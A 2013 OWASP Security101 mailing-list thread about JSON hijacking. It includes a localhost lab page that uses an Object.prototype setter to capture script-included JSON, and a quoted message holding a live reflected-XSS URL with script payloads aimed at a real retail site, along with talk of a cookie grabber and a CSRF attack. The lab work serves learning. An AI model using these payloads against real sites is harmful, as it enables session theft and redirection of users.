[OWASP-Security101] JSON with XSS and CSRF exploitation.

Chendil Kumar Manoharan mkchendil at gmail.com
Tue Apr 23 19:44:39 UTC 2013


Hi,

I am trying to learn about JSON hijacking. Here is the code for the
vulnerable site, which sends the JSONArray, and the code of the malicious
site, which has the script tag pointing to the vulnerable site.

Malicious site: http://localhost:8888/ returns

<html>
  <body>
    <script type="text/javascript">
      Object.prototype.__defineSetter__('Balance', function(obj){ alert(obj); });
    </script>
    <script src="http://localhost:9999/"></script>
    <form name="myForm">
      <p><label>Form name: <input type="text" name="text1" value="Beluga"></label></p>
      <p><input name="button1" type="button" value="Show Form Name"
                onclick="Object.prototype.Balance='test'"></p>
    </form>
  </body>
</html>

Vulnerable site: http://localhost:9999 returns

[{"Id":1,"Balance":3.14},{"Id":2,"Balance":2.72},{"Id":3,"Balance":1.62}]



When I load the malicious site, I still get the alert with the value "test",
but I was expecting the value of Balance.

Can someone help me understand what is wrong in the code for simulating
JSON hijacking?

Thanks
Chendil


On Fri, Apr 19, 2013 at 8:13 AM, Shritam Bhowmick <
shritam.bhowmick at gmail.com> wrote:

> Hello, OWASP,
>
> I am on a project and trying to actually penetrate (demonstrate to) a client
> the seriousness of an XSS attack. The attack is on a JSON server.
> It's not accepting HTTP methods that would let me deploy a cookie grabber to
> explain to him how serious the problem is.
>
> This is the original link. I would really request and love to get suggestions
> on what more I can do to convey to the CTO that this is a serious flaw.
>
>
> http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=%3Cb%3Eabcd1%3Cscript%3Ealert%280%29%3C/script%3E%3Cscript%3Ealert%28document.location%29%3C/script%3E%3Cscript%3Edocument.location=%22http://http://http://www.yahoo.com%22%3C/script%3E
>
> also this:
>
> www.snapdeal.com/gtcol?pc=
>
> I referred to
> http://blog.spiderlabs.com/2012/09/json-hijacking-demystified.html
> but the point is I am not able to decide what to do with it. Is it
> supposed to do a CSRF attack? If yes, how?
> --
>  Regards
> Shritam Bhowmick
> Security Analyst
> Lucideus Tech Pvt Ltd
>
> _______________________________________________
> Security101 mailing list
> Security101 at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/security101
> List Run By OWASP
> List Admin: Michael.Coates at owasp.org
>

